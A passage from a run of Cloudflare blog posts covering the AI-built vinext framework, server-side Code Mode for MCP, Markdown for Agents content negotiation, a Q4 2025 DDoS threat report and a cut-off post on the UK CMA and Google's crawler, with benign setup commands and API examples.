Vite is an excellent foundation. Vite handles the hard parts of front-end tooling: fast HMR, native ESM, a clean plugin API, production bundling. We didn't have to build a bundler. We just had to teach it to speak Next.js. @vitejs/plugin-rsc is still early, but it gave us React Server Components support without having to build an RSC implementation from scratch.

The models caught up. We don't think this would have been possible even a few months ago. Earlier models couldn't sustain coherence across a codebase this size. New models can hold the full architecture in context, reason about how modules interact, and produce correct code often enough to keep momentum going. At times, I saw it go into Next, Vite, and React internals to figure out a bug. The state-of-the-art models are impressive, and they seem to keep getting better.

All of those things had to be true at the same time. Well-documented target API, comprehensive test suite, solid build tool underneath, and a model that could actually handle the complexity. Take any one of them away and this doesn't work nearly as well.

How we actually built it

Almost every line of code in vinext was written by AI. But here's the thing that matters more: every line passes the same quality gates you'd expect from human-written code. The project has 1,700+ Vitest tests, 380 Playwright E2E tests, full TypeScript type checking via tsgo, and linting via oxlint. Continuous integration runs all of it on every pull request. Establishing a set of good guardrails is critical to making AI productive in a codebase.

The process started with a plan. I spent a couple of hours going back and forth with Claude in OpenCode to define the architecture: what to build, in what order, which abstractions to use. That plan became the north star. From there, the workflow was straightforward:

Define a task ("implement the next/navigation shim with usePathname, useSearchParams, useRouter").
Let the AI write the implementation and tests.
Run the test suite.
If tests pass, merge. If not, give the AI the error output and let it iterate.
Repeat.

We wired up AI agents for code review too. When a PR was opened, an agent reviewed it. When review comments came back, another agent addressed them. The feedback loop was mostly automated.

It didn't work perfectly every time. There were PRs that were just wrong. The AI would confidently implement something that seemed right but didn't match actual Next.js behavior. I had to course-correct regularly. Architecture decisions, prioritization, knowing when the AI was headed down a dead end: that was all me. When you give AI good direction, good context, and good guardrails, it can be very productive. But the human still has to steer.

For browser-level testing, I used agent-browser to verify actual rendered output, client-side navigation, and hydration behavior. Unit tests miss a lot of subtle browser issues. This caught them.

Over the course of the project, we ran over 800 sessions in OpenCode. Total cost: roughly $1,100 in Claude API tokens.

What this means for software

Why do we have so many layers in the stack? This project forced me to think deeply about this question. And to consider how AI impacts the answer.

Most abstractions in software exist because humans need help. We couldn't hold the whole system in our heads, so we built layers to manage the complexity for us. Each layer made the next person's job easier. That's how you end up with frameworks on top of frameworks, wrapper libraries, thousands of lines of glue code.

AI doesn't have the same limitation. It can hold the whole system in context and just write the code. It doesn't need an intermediate framework to stay organized. It just needs a spec and a foundation to build on.

It's not clear yet which abstractions are truly foundational and which ones were just crutches for human cognition. That line is going to shift a lot over the next few years. But vinext is a data point. We took an API contract, a build tool, and an AI model, and the AI wrote everything in between. No intermediate framework needed. We think this pattern will repeat across a lot of software. The layers we've built up over the years aren't all going to make it.

Acknowledgments

Thanks to the Vite team. Vite is the foundation this whole thing stands on. @vitejs/plugin-rsc is still early days, but it gave me RSC support without having to build that from scratch, which would have been a dealbreaker. The Vite maintainers were responsive and helpful as I pushed the plugin into territory it hadn't been tested in before.

We also want to acknowledge the Next.js team. They've spent years building a framework that raised the bar for what React development could look like. The fact that their API surface is so well-documented and their test suite so comprehensive is a big part of what made this project possible. vinext wouldn't exist without the standard they set.

Try it

vinext includes an Agent Skill that handles migration for you. It works with Claude Code, OpenCode, Cursor, Codex, and dozens of other AI coding tools. Install it, open your Next.js project, and tell the AI to migrate:

npx skills add cloudflare/vinext

Then open your Next.js project in any supported tool and say:

migrate this project to vinext

The skill handles compatibility checking, dependency installation, config generation, and dev server startup. It knows what vinext supports and will flag anything that needs manual attention.

Or if you prefer doing it by hand:

npx vinext init    # Migrate an existing Next.js project
npx vinext dev     # Start the dev server
npx vinext deploy  # Ship to Cloudflare Workers

The source is at github.com/cloudflare/vinext. Issues, PRs, and feedback are welcome.

Code Mode: give agents an entire API in 1,000 tokens

Matt Carey — Fri, 20 Feb 2026 14:00:00 GMT

Model Context Protocol (MCP) has become the standard way for AI agents to use external tools. But there is a tension at its core: agents need many tools to do useful work, yet every tool added fills the model's context window, leaving less room for the actual task.

Code Mode is a technique we first introduced for reducing context window usage during agent tool use. Instead of describing every operation as a separate tool, let the model write code against a typed SDK and execute the code safely in a Dynamic Worker Loader. The code acts as a compact plan. The model can explore tool operations, compose multiple calls, and return just the data it needs. Anthropic independently explored the same pattern in their Code Execution with MCP post.

Today we are introducing a new MCP server for the entire Cloudflare API — from DNS and Zero Trust to Workers and R2 — that uses Code Mode. With just two tools, search() and execute(), the server is able to provide access to the entire Cloudflare API over MCP, while consuming only around 1,000 tokens. The footprint stays fixed, no matter how many API endpoints exist.

For a large API like the Cloudflare API, Code Mode reduces the number of input tokens used by 99.9%. An equivalent MCP server without Code Mode would consume 1.17 million tokens — more than the entire context window of the most advanced foundation models.

^{Code mode savings vs native MCP, measured with}^tiktoken

You can start using this new Cloudflare MCP server today. And we are also open-sourcing a new Code Mode SDK in the Cloudflare Agents SDK, so you can use the same approach in your own MCP servers and AI Agents.

Server‑side Code Mode

This new MCP server applies Code Mode server-side. Instead of thousands of tools, the server exports just two: search() and execute(). Both are powered by Code Mode. Here is the full tool surface area that gets loaded into the model context:

[
  {
    "name": "search",
    "description": "Search the Cloudflare OpenAPI spec. All $refs are pre-resolved inline.",
    "inputSchema": {
      "type": "object",
      "properties": {
        "code": {
          "type": "string",
          "description": "JavaScript async arrow function to search the OpenAPI spec"
        }
      },
      "required": ["code"]
    }
  },
  {
    "name": "execute",
    "description": "Execute JavaScript code against the Cloudflare API.",
    "inputSchema": {
      "type": "object",
      "properties": {
        "code": {
          "type": "string",
          "description": "JavaScript async arrow function to execute"
        }
      },
      "required": ["code"]
    }
  }
]

To discover what it can do, the agent calls search(). It writes JavaScript against a typed representation of the OpenAPI spec. The agent can filter endpoints by product, path, tags, or any other metadata and narrow thousands of endpoints to the handful it needs. The full OpenAPI spec never enters the model context. The agent only interacts with it through code.

When the agent is ready to act, it calls execute(). The agent writes code that can make Cloudflare API requests, handle pagination, check responses, and chain operations together in a single execution.

Both tools run the generated code inside a Dynamic Worker isolate — a lightweight V8 sandbox with no file system, no environment variables to leak through prompt injection and external fetches disabled by default. Outbound requests can be explicitly controlled with outbound fetch handlers when needed.

Example: Protecting an origin from DDoS attacks

Suppose a user tells their agent: "protect my origin from DDoS attacks." The agent's first step is to consult documentation. It might call the Cloudflare Docs MCP Server, use a Cloudflare Skill, or search the web directly. From the docs it learns: put Cloudflare WAF and DDoS protection rules in front of the origin.

Step 1: Search for the right endpoints The search tool gives the model a spec object: the full Cloudflare OpenAPI spec with all $refs pre-resolved. The model writes JavaScript against it. Here the agent looks for WAF and ruleset endpoints on a zone:

async () => {
  const results = [];
  for (const [path, methods] of Object.entries(spec.paths)) {
    if (path.includes('/zones/') &&
        (path.includes('firewall/waf') || path.includes('rulesets'))) {
      for (const [method, op] of Object.entries(methods)) {
        results.push({ method: method.toUpperCase(), path, summary: op.summary });
      }
    }
  }
  return results;
}

The server runs this code in a Workers isolate and returns:

[
  { "method": "GET",    "path": "/zones/{zone_id}/firewall/waf/packages",              "summary": "List WAF packages" },
  { "method": "PATCH",  "path": "/zones/{zone_id}/firewall/waf/packages/{package_id}", "summary": "Update a WAF package" },
  { "method": "GET",    "path": "/zones/{zone_id}/firewall/waf/packages/{package_id}/rules", "summary": "List WAF rules" },
  { "method": "PATCH",  "path": "/zones/{zone_id}/firewall/waf/packages/{package_id}/rules/{rule_id}", "summary": "Update a WAF rule" },
  { "method": "GET",    "path": "/zones/{zone_id}/rulesets",                           "summary": "List zone rulesets" },
  { "method": "POST",   "path": "/zones/{zone_id}/rulesets",                           "summary": "Create a zone ruleset" },
  { "method": "GET",    "path": "/zones/{zone_id}/rulesets/phases/{ruleset_phase}/entrypoint", "summary": "Get a zone entry point ruleset" },
  { "method": "PUT",    "path": "/zones/{zone_id}/rulesets/phases/{ruleset_phase}/entrypoint", "summary": "Update a zone entry point ruleset" },
  { "method": "POST",   "path": "/zones/{zone_id}/rulesets/{ruleset_id}/rules",        "summary": "Create a zone ruleset rule" },
  { "method": "PATCH",  "path": "/zones/{zone_id}/rulesets/{ruleset_id}/rules/{rule_id}", "summary": "Update a zone ruleset rule" }
]

The full Cloudflare API spec has over 2,500 endpoints. The model narrowed that to the WAF and ruleset endpoints it needs, without any of the spec entering the context window.

The model can also drill into a specific endpoint's schema before calling it. Here it inspects what phases are available on zone rulesets:

async () => {
  const op = spec.paths['/zones/{zone_id}/rulesets']?.get;
  const items = op?.responses?.['200']?.content?.['application/json']?.schema;
  // Walk the schema to find the phase enum
  const props = items?.allOf?.[1]?.properties?.result?.items?.allOf?.[1]?.properties;
  return { phases: props?.phase?.enum };
}

{
  "phases": [
    "ddos_l4", "ddos_l7",
    "http_request_firewall_custom", "http_request_firewall_managed",
    "http_response_firewall_managed", "http_ratelimit",
    "http_request_redirect", "http_request_transform",
    "magic_transit", "magic_transit_managed"
  ]
}

The agent now knows the exact phases it needs: ddos_l7 for DDoS protection and http_request_firewall_managed for WAF.

Step 2: Act on the API The agent switches to using execute. The sandbox gets a cloudflare.request() client that can make authenticated calls to the Cloudflare API. First the agent checks what rulesets already exist on the zone:

async () => {
  const response = await cloudflare.request({
    method: "GET",
    path: `/zones/${zoneId}/rulesets`
  });
  return response.result.map(rs => ({
    name: rs.name, phase: rs.phase, kind: rs.kind
  }));
}

[
  { "name": "DDoS L7",          "phase": "ddos_l7",                        "kind": "managed" },
  { "name": "Cloudflare Managed","phase": "http_request_firewall_managed", "kind": "managed" },
  { "name": "Custom rules",     "phase": "http_request_firewall_custom",   "kind": "zone" }
]

The agent sees that managed DDoS and WAF rulesets already exist. It can now chain calls to inspect their rules and update sensitivity levels in a single execution:

async () => {
  // Get the current DDoS L7 entrypoint ruleset
  const ddos = await cloudflare.request({
    method: "GET",
    path: `/zones/${zoneId}/rulesets/phases/ddos_l7/entrypoint`
  });

  // Get the WAF managed ruleset
  const waf = await cloudflare.request({
    method: "GET",
    path: `/zones/${zoneId}/rulesets/phases/http_request_firewall_managed/entrypoint`
  });
}

This entire operation, from searching the spec and inspecting a schema to listing rulesets and fetching DDoS and WAF configurations, took four tool calls.

The Cloudflare MCP server

We started with MCP servers for individual products. Want an agent that manages DNS? Add the DNS MCP server. Want Workers logs? Add the Workers Observability MCP server. Each server exported a fixed set of tools that mapped to API operations. This worked when the tool set was small, but the Cloudflare API has over 2,500 endpoints. No collection of hand-maintained servers could keep up.

The Cloudflare MCP server simplifies this. Two tools, roughly 1,000 tokens, and coverage of every endpoint in the API. When we add new products, the same search() and execute() code paths discover and call them — no new tool definitions, no new MCP servers. It even has support for the GraphQL Analytics API.

Our MCP server is built on the latest MCP specifications. It is OAuth 2.1 compliant, using Workers OAuth Provider to downscope the token to selected permissions approved by the user when connecting. The agent only gets the capabilities the user explicitly granted.

For developers, this means you can use a simple agent loop and still give your agent access to the full Cloudflare API with built-in progressive capability discovery.

Comparing approaches to context reduction

Several approaches have emerged to reduce how many tokens MCP tools consume:

Client-side Code Mode was our first experiment. The model writes TypeScript against typed SDKs and runs it in a Dynamic Worker Loader on the client. The tradeoff is that it requires the agent to ship with secure sandbox access. Code Mode is implemented in Goose and Anthropics Claude SDK as Programmatic Tool Calling.

Command-line interfaces are another path. CLIs are self-documenting and reveal capabilities as the agent explores. Tools like OpenClaw and Moltworker convert MCP servers into CLIs using MCPorter to give agents progressive disclosure. The limitation is obvious: the agent needs a shell, which not every environment provides and which introduces a much broader attack surface than a sandboxed isolate.

Dynamic tool search, as used by Anthropic in Claude Code, surfaces a smaller set of tools hopefully relevant to the current task. It shrinks context use but now requires a search function that must be maintained and evaluated, and each matched tool still uses tokens.

Each approach solves a real problem. But for MCP servers specifically, server-side Code Mode combines their strengths: fixed token cost regardless of API size, no modifications needed on the agent side, progressive discovery built in, and safe execution inside a sandboxed isolate. The agent just calls two tools with code. Everything else happens on the server.

Get started today

The Cloudflare MCP server is available now. Point your MCP client at the server URL and you'll be redirected to Cloudflare to authorize and select the permissions to grant to your agent. Add this config to your MCP client:

{
  "mcpServers": {
    "cloudflare-api": {
      "url": "https://mcp.cloudflare.com/mcp"
    }
  }
}

For CI/CD, automation, or if you prefer managing tokens yourself, create a Cloudflare API token with the permissions you need. Both user tokens and account tokens are supported and can be passed as bearer tokens in the Authorization header.

More information on different MCP setup configurations can be found at the Cloudflare MCP repository.

Looking forward

Code Mode solves context costs for a single API. But agents rarely talk to one service. A developer's agent might need the Cloudflare API alongside GitHub, a database, and an internal docs server. Each additional MCP server brings the same context window pressure we started with.

Cloudflare MCP Server Portals let you compose multiple MCP servers behind a single gateway with unified auth and access control. We are building a first-class Code Mode integration for all your MCP servers, and exposing them to agents with built-in progressive discovery and the same fixed-token footprint, regardless of how many services sit behind the gateway.

Introducing Markdown for Agents

Celso Martinho — Thu, 12 Feb 2026 14:03:00 GMT

The way content and businesses are discovered online is changing rapidly. In the past, traffic originated from traditional search engines, and SEO determined who got found first. Now the traffic is increasingly coming from AI crawlers and agents that demand structured data within the often-unstructured Web that was built for humans.

As a business, to continue to stay ahead, now is the time to consider not just human visitors, or traditional wisdom for SEO-optimization, but start to treat agents as first-class citizens.

Why markdown is important

Feeding raw HTML to an AI is like paying by the word to read packaging instead of the letter inside. A simple ## About Us on a page in markdown costs roughly 3 tokens; its HTML equivalent –

`About Us`

– burns 12-15, and that's before you account for the

wrappers, nav bars, and script tags that pad every real web page and have zero semantic value.

This blog post you’re reading takes 16,180 tokens in HTML and 3,150 tokens when converted to markdown. That’s a 80% reduction in token usage.

Markdown has quickly become the lingua franca for agents and AI systems as a whole. The format’s explicit structure makes it ideal for AI processing, ultimately resulting in better results while minimizing token waste.

The problem is that the Web is made of HTML, not markdown, and page weight has been steadily increasing over the years, making pages hard to parse. For agents, their goal is to filter out all non-essential elements and scan the relevant content.

The conversion of HTML to markdown is now a common step for any AI pipeline. Still, this process is far from ideal: it wastes computation, adds costs and processing complexity, and above all, it may not be how the content creator intended their content to be used in the first place.

What if AI agents could bypass the complexities of intent analysis and document conversion, and instead receive structured markdown directly from the source?

Convert HTML to markdown, automatically

Cloudflare's network now supports real-time content conversion at the source, for enabled zones using content negotiation headers. Now when AI systems request pages from any website that uses Cloudflare and has Markdown for Agents enabled, they can express the preference for text/markdown in the request. Our network will automatically and efficiently convert the HTML to markdown, when possible, on the fly.

Here’s how it works. To fetch the markdown version of any page from a zone with Markdown for Agents enabled, the client needs to add the Accept negotiation header with text/markdown as one of the options. Cloudflare will detect this, fetch the original HTML version from the origin, and convert it to markdown before serving it to the client.

Here's a curl example with the Accept negotiation header requesting a page from our developer documentation:

curl https://developers.cloudflare.com/fundamentals/reference/markdown-for-agents/ \
  -H "Accept: text/markdown"

Or if you’re building an AI Agent using Workers, you can use TypeScript:

const r = await fetch(
  `https://developers.cloudflare.com/fundamentals/reference/markdown-for-agents/`,
  {
    headers: {
      Accept: "text/markdown, text/html",
    },
  },
);
const tokenCount = r.headers.get("x-markdown-tokens");
const markdown = await r.text();

We already see some of the most popular coding agents today – like Claude Code and OpenCode – send these accept headers with their requests for content. Now, the response to this request is formatted in markdown. It's that simple.

HTTP/2 200
date: Wed, 11 Feb 2026 11:44:48 GMT
content-type: text/markdown; charset=utf-8
content-length: 2899
vary: accept
x-markdown-tokens: 725
content-signal: ai-train=yes, search=yes, ai-input=yes

---
title: Markdown for Agents · Cloudflare Agents docs
---

## What is Markdown for Agents

The ability to parse and convert HTML to Markdown has become foundational for AI.
...

Note that we include an x-markdown-tokens header with the converted response that indicates the estimated number of tokens in the markdown document. You can use this value in your flow, for example to calculate the size of a context window or to decide on your chunking strategy.

Here’s a diagram of how it works:

Content Signals Policy

During our last Birthday Week, Cloudflare announced Content Signals — a framework that allows anyone to express their preferences for how their content can be used after it has been accessed.

When you return markdown, you want to make sure your content is being used by the Agent or AI crawler. That’s why Markdown for Agents converted responses include the Content-Signal: ai-train=yes, search=yes, ai-input=yes header signaling that indicates content can be used for AI Training, Search results and AI Input, which includes agentic use. Markdown for Agents will provide options to define custom Content Signal policies in the future.

Check our dedicated Content Signals page for more information on this framework.

Try it with the Cloudflare Blog & Developer Documentation

We enabled this feature in our Developer Documentation and our Blog, inviting all AI crawlers and agents to consume our content using markdown instead of HTML.

Try it out now by requesting this blog with Accept: text/markdown.

curl https://blog.cloudflare.com/markdown-for-agents/ \
  -H "Accept: text/markdown"

The result is:

---
description: The way content is discovered online is shifting, from traditional search engines to AI agents that need structured data from a Web built for humans. It’s time to consider not just human visitors, but start to treat agents as first-class citizens. Markdown for Agents automatically converts any HTML page requested from our network to markdown.
title: Introducing Markdown for Agents
image: https://blog.cloudflare.com/images/markdown-for-agents.png
---

# Introducing Markdown for Agents

The way content and businesses are discovered online is changing rapidly. In the past, traffic originated from traditional search engines and SEO determined who got found first. Now the traffic is increasingly coming from AI crawlers and agents that demand structured data within the often-unstructured Web that was built for humans.

...

Other ways to convert to Markdown

If you’re building AI systems that require arbitrary document conversion from outside Cloudflare or Markdown for Agents is not available from the content source, we provide other ways to convert documents to Markdown for your applications:

Workers AI AI.toMarkdown() supports multiple document types, not just HTML, and summarization.
Browser Rendering /markdown REST API supports markdown conversion if you need to render a dynamic page or application in a real browser before converting it.

Tracking markdown usage

Anticipating a shift in how AI systems browse the Web, Cloudflare Radar now includes content type insights for AI bot and crawler traffic, both globally on the AI Insights page and in the individual bot information pages.

The new content_type dimension and filter shows the distribution of content types returned to AI agents and crawlers, grouped by MIME type category.

You can also see the requests for markdown filtered by a specific agent or crawler. Here are the requests that return markdown to OAI-Searchbot, the crawler used by OpenAI to power ChatGPT’s search:

This new data will allow us to track the evolution of how AI bots, crawlers, and agents are consuming Web content over time. As always, everything on Radar is freely accessible via the public APIs and the Data Explorer.

Start using today

To enable Markdown for Agents for your zone, log into the Cloudflare dashboard, select your account, select the zone, look for Quick Actions and toggle the Markdown for Agents button to enable. This feature is available today in Beta at no cost for Pro, Business and Enterprise plans, as well as SSL for SaaS customers.

You can find more information about Markdown for Agents on our Developer Docs. We welcome your feedback as we continue to refine and enhance this feature. We’re curious to see how AI crawlers and agents navigate and adapt to the unstructured nature of the Web as it evolves.

2025 Q4 DDoS threat report: A record-setting 31.4 Tbps attack caps a year of massive DDoS assaults

Omer Yoachimik — Thu, 05 Feb 2026 14:00:00 GMT

Welcome to the 24th edition of Cloudflare’s Quarterly DDoS Threat Report. In this report, Cloudforce One offers a comprehensive analysis of the evolving threat landscape of Distributed Denial of Service (DDoS) attacks based on data from the Cloudflare network. In this edition, we focus on the fourth quarter of 2025, as well as share overall 2025 data.

The fourth quarter of 2025 was characterized by an unprecedented bombardment launched by the Aisuru-Kimwolf botnet, dubbed “The Night Before Christmas" DDoS attack campaign. The campaign targeted Cloudflare customers as well as Cloudflare’s dashboard and infrastructure with hyper-volumetric HTTP DDoS attacks exceeding rates of 200 million requests per second (rps), just weeks after a record-breaking 31.4 Terabits per second (Tbps) attack.

Key insights

DDoS attacks surged by 121% in 2025, reaching an average of 5,376 attacks automatically mitigated every hour.
In the final quarter of 2025, Hong Kong jumped 12 places, making it the second most DDoS’d place on earth. The United Kingdom also leapt by an astonishing 36 places, making it the sixth most-attacked place.
Infected Android TVs — part of the Aisuru-Kimwolf botnet — bombarded Cloudflare’s network with hyper-volumetric HTTP DDoS attacks, while Telcos emerged as the most-attacked industry.

2025 saw a huge spike in DDoS attacks

In 2025, the total number of DDoS attacks more than doubled to an incredible 47.1 million. Such attacks have soared in recent years: The number of DDoS attacks spiked 236% between 2023 and 2025.

In 2025, Cloudflare mitigated an average of 5,376 DDoS attacks every hour — of these, 3,925 were network-layer DDoS attacks and 1,451 were HTTP DDoS attacks.

Network-layer DDoS attacks more than tripled in 2025

The most substantial growth was in network-layer DDoS attacks, which more than tripled year over year. Cloudflare mitigated 34.4 million network-layer DDoS attacks in 2025, compared to 11.4 million in 2024.

A substantial portion of the network-layer attacks — approximately 13.5 million — targeted global Internet infrastructure protected by Cloudflare Magic Transit and Cloudflare’s infrastructure directly, as part of an 18-day DDoS campaign in the first quarter of 2025. Of these attacks, 6.9 million targeted Magic Transit customers while the remaining 6.6 million targeted Cloudflare directly.

This assault was a multi-vector DDoS campaign comprising SYN flood attacks, Mirai-generated DDoS attacks, and SSDP amplification attacks to name a few. Our systems detected and mitigated these attacks automatically. In fact, we only discovered the campaign while preparing our DDoS threat report for 2025 Q1 — an example of how effective Cloudflare’s DDoS mitigation is!

In the final quarter of 2025, the number of DDoS attacks grew by 31% over the previous quarter and 58% over 2024. Network-layer DDoS attacks fueled that growth. In 2025 Q4, network-layer DDoS attacks accounted for 78% of all DDoS attacks. The amount of HTTP DDoS attacks remained the same, but surged in their size to rates that we haven’t seen since the HTTP/2 Rapid Reset DDoS campaign in 2023. These recent surges were launched by the Aisuru-Kimwolf botnet, which we will cover in the next section.

“The Night Before Christmas” DDoS campaign

On Friday, December 19, 2025, the Aisuru-Kimwolf botnet began bombarding Cloudflare infrastructure and Cloudflare customers with hyper-volumetric DDoS attacks. What was new in this campaign was its size: The botnet used hyper-volumetric HTTP DDoS attacks exceeding rates of 20 million requests per second (Mrps).

The Aisuru-Kimwolf botnet is a massive collection of malware-infected devices, primarily Android TVs. The botnet comprises an estimated 1-4 million infected hosts. It is capable of launching DDoS attacks that can cripple critical infrastructure, crash most legacy cloud-based DDoS protection solutions, and even disrupt the connectivity of entire nations.

Throughout the campaign, Cloudflare’s autonomous DDoS defense systems detected and mitigated all of the attacks: 384 packet-intensive attacks, 329 bit-intensive attacks, and 189 request-intensive attacks, for a total of 902 hyper-volumetric DDoS attacks, averaging 53 attacks a day.

The average size of the hyper-volumetric DDoS attacks during the campaign were 3 Bpps, 4 Tbps, and 54 Mrps. The maximum rates recorded during the campaign were 9 Bpps, 24 Tbps, and 205 Mrps.

To put that in context, the scale of a 205 Mrps DDoS attack is comparable to the combined populations of the UK, Germany, and Spain all simultaneously typing a website address and then hitting 'enter’ at the same second.

While highly dramatic, The Night Before Christmas campaign accounted for only a small portion of the hyper-volumetric DDoS attacks we saw throughout the year.

Hyper-volumetric DDoS attacks

Throughout 2025, Cloudflare observed a continuous increase in hyper-volumetric DDoS attacks. In 2025 Q4, hyper-volumetric attacks increased by 40% compared to the previous quarter.

As the number of attacks increased over the course of 2025, the size of the attacks increased as well, growing by over 700% compared to the large attacks seen in late 2024, with one reaching 31.4 Tbps in a DDoS attack that lasted just 35 seconds. The graph below portrays the rapid growth in DDoS attack sizes as seen and blocked by Cloudflare — each one a world record, i.e. the largest ever disclosed publicly by any company at the time.

Like all of the other attacks, the 31.4 Tbps DDoS attack was detected and mitigated automatically by Cloudflare’s autonomous DDoS defense, which was able to adapt and quickly lock on to botnets such as Aisuru-Kimwolf.

Most of the hyper-volumetric DDoS attacks targeted Cloudflare customers in the Telecommunications, Service Providers and Carriers industry. Cloudflare customers in the Gaming industry and customers providing Generative AI services were also heavily targeted. Lastly, Cloudflare’s own infrastructure itself was targeted by multiple attack vectors such as HTTP floods, DNS attacks and UDP flood.

Most-attacked industries

When analyzing DDoS attacks of all sizes, the Telecommunications, Service Providers and Carriers industry was also the most targeted. Previously, the Information Technology & Services industry held that unlucky title.

The Gambling & Casinos and Gaming industries ranked third and fourth, respectively. The quarter’s biggest changes in the top 10 were the Computer Software and Business Services industries, which both climbed several spots.

The most-attacked industries are defined by their role as critical infrastructure, a central backbone for other businesses, or their immediate, high-stakes financial sensitivity to service interruption and latency.

Most-attacked locations

The DDoS landscape saw both predictable stability and dramatic shifts among the world's most-attacked locations. Targets like China, Germany, Brazil, and the United States were the top five, demonstrating persistent appeal for attackers.

Hong Kong made a significant move, jumping twelve spots to land at number two. However, the bigger story was the meteoric rise of the United Kingdom, which surged an astonishing 36 places this quarter, making it the sixth most-attacked location.

Vietnam held its place as the seventh most-attacked location, followed by Azerbaijan in eighth, India in ninth, and Singapore as number ten.

Top attack sources

Bangladesh dethroned Indonesia as the largest source of DDoS attacks in the fourth quarter of 2025. Indonesia dropped to the third spot, after spending a year as the top source of DDoS attacks. Ecuador also jumped two spots, making it the second-largest source.

Notably, Argentina soared an incredible twenty places, making it the fourth-largest source of DDoS attacks. Hong Kong rose three places, taking fifth place. Ukraine came in sixth place, followed by Vietnam, Taiwan, Singapore, and Peru.

Top source networks

The top 10 list of attack source networks reads like a list of Internet giants, revealing a fascinating story about the anatomy of modern DDoS attacks. The common thread is clear: Threat actors are leveraging the world's most accessible and powerful network infrastructure — primarily large, public-facing services.

We see most DDoS attacks coming from IP addresses associated with Cloud Computing Platforms and Cloud Infrastructure Providers, including DigitalOcean (AS 14061), Microsoft (AS 8075), Tencent (AS 132203), Oracle (AS 31898), and Hetzner (AS 24940). This demonstrates the strong link between easily-provisioned virtual machines and high-volume attacks. These cloud sources, heavily concentrated in the United States, are closely followed by a significant presence of attacks coming from IP addresses associated with traditional Telecommunications Providers (Telcos). These Telcos, primarily from the Asia-Pacific region (including Vietnam, China, Malaysia, and Taiwan), round out the rest of the top 10.

This geographic and organizational diversity confirms a two-pronged attack reality: While the sheer scale of the highest-ranking sources often originates from global cloud hubs, the problem is truly worldwide, routed through the Internet's most critical pathways from across the globe. In many DDoS attacks, we see thousands of various source ASNs, highlighting the truly global distribution of botnet nodes.

To help hosting providers, cloud computing platforms and Internet service providers identify and take down the abusive IP addresses/accounts that launch these attacks, we leverage Cloudflare’s unique vantage point on DDoS attacks to provide a free DDoS Botnet Threat Feed for Service Providers.

Over 800 networks worldwide have signed up for this feed, and we’ve already seen great collaboration across the community to take down botnet nodes.

Helping defend the Internet

DDoS attacks are rapidly growing in sophistication and size, surpassing what was previously imaginable. This evolving threat landscape presents a significant challenge for many organizations to keep pace. Organizations currently relying on on-premise mitigation appliances or on-demand scrubbing centers may benefit from re-evaluating their defense strategy.

Cloudflare is dedicated to offering free, unmetered DDoS protection to all its customers, regardless of the size, duration, or volume of attacks, leveraging its vast global network and autonomous DDoS mitigation systems.

About Cloudforce One

Driven by a mission to help defend the Internet, Cloudforce One leverages telemetry from Cloudflare’s global network — which protects approximately 20% of the web — to drive threat research and operational response, protecting critical systems for millions of organizations worldwide.

Google’s AI advantage: why crawler separation is the only path to a fair Internet

Maria Palmieri — Fri, 30 Jan 2026 17:01:04 GMT

Earlier this week, the UK’s Competition and Markets Authority (CMA) opened its consultation on a package of proposed conduct requirements for Google. The consultation invites comments on the proposed requirements before the CMA imposes any final measures. These new rules aim to address the lack of choice and transparency that publishers (broadly defined as “any party that makes content available on the web”) face over how Google uses search to fuel its generative AI services and features. These are the first consultations on conduct requirements launched under the digital markets competition regime in the UK.

We welcome the CMA’s recognition that publishers need a fairer deal and believe the proposed rules are a step into the right direction. Publishers should be entitled to have access to tools that enable them to control the inclusion of their content in generative AI services, and AI companies should have a level playing field on which to compete.

But we believe the CMA has not gone far enough and should do more to safeguard the UK’s creative sector and foster healthy competition in the market for generative and agentic AI.

CMA designation of Google as having Strategic Market Status

In January 2025, the UK’s regulatory landscape underwent a significant legal shift with the implementation of the Digital Markets, Competition and Consumers Act 2024 (DMCC). Rather than relying on antitrust investigations to address risks to competition, the CMA can now designate firms as having Strategic Market Status (SMS) when they hold substantial, entrenched market power. This designation allows for targeted CMA interventions in digital markets, such as imposing detailed conduct requirements, to improve competition.

In October 2025, the CMA designated Google as having SMS in general search and search advertising, given its 90 percent share of the search market in the UK. Crucially, this designation encompasses AI Overviews and AI Mode, with the CMA now having the authority to impose conduct requirements on Google’s search ecosystem. Final requirements imposed by the CMA are not merely suggestions but legally enforceable rules that can relate specifically to AI crawling with significant sanctions to ensure Google operates fairly.

Publishers need a meaningful way to opt out of Google’s use of their content for generative AI

The CMA’s designation could not be more timely. As we’ve said before, we are indisputably in a time when the Internet needs clear “rules of the road” for AI crawling behavior.

As the CMA rightly states, “publishers have no realistic option but to allow their content to be crawled for Google’s general search because of the market power Google holds in general search. However, Google currently uses that content in both its search generative AI features and in its broader generative AI services.”

In other words: the same content that Google scrapes for search indexing is also used for inference/grounding purposes, like AI Overviews and AI Mode, which rely on fetching live information from the Internet in response to real-time user queries. And that creates a big problem for publishers—and for competition.

Because publishers cannot afford to disallow or block Googlebot, Google’s search crawler, on their website, they have to accept that their content will be used in generative AI applications such as AI Overviews and AI Mode within Google Search that return very little, if any, traffic to their websites. This undermines the ad-supported business models that have sustained digital publishing for decades, given the critical role of Google Search in driving human traffic to online advertising. It also means that Google’s generative AI applications enter into direct competition with publishers by reproducing their content, most often without attribution or compensation.

Publishers’ reluctance to block Google because of its dominance in search gives Google an unfair competitive advantage in the market for generative and agentic AI. Unlike other AI bot operators, Google can use its search crawler to gather data for a variety of AI functions with little fear that its access will be restricted. It has minimal incentive to pay publishers for that data, which it is already getting for free.

This prevents the emergence of a well-functioning marketplace where AI developers negotiate fair value for content. Instead, other AI companies are disincentivized from coming to the table, as they are structurally disadvantaged by a system that allows one dominant player to bypass compensation entirely. As the CMA itself recognizes, "[b]y not providing sufficient control over how this content is used, Google can limit the ability of publishers to monetise their content, while accessing content for AI-generated results in a way that its competitors cannot match”.

Google’s advantage

Cloudflare data validates the concern about Google’s competitive advantage. Based on our data, Googlebot sees significantly more Internet content than its closest peers.

Over an observed period of two months, Googlebot successfully accessed individual pages almost two times more than ClaudeBot and GPTBot, three times more than Meta-ExternalAgent, and more than three times more than Bingbot. The difference was even more extreme for other popular AI crawlers: for instance, Googlebot saw 167 times more unique pages than PerplexityBot. Out of the sampled unique URLs using our network that we observed over the last two months, Googlebot crawled roughly 8%.

In rounded multiple terms, Googlebot sees:

vs. ~1.70x the amount of unique URLs seen by ClaudeBot;
vs. ~1.76x the amount of unique URLs seen by GPTBot;
vs. ~2.99x the amount of unique URLs by Meta-ExternalAgent;
vs. ~3.26x the amount of unique URLs seen by Bingbot;
vs. ~5.09x the amount of unique URLs seen by Amazonbot;
vs. ~14.87x the amount of unique URLs seen by Applebot;
vs. ~23.73x the amount of unique URLs seen by Bytespider;
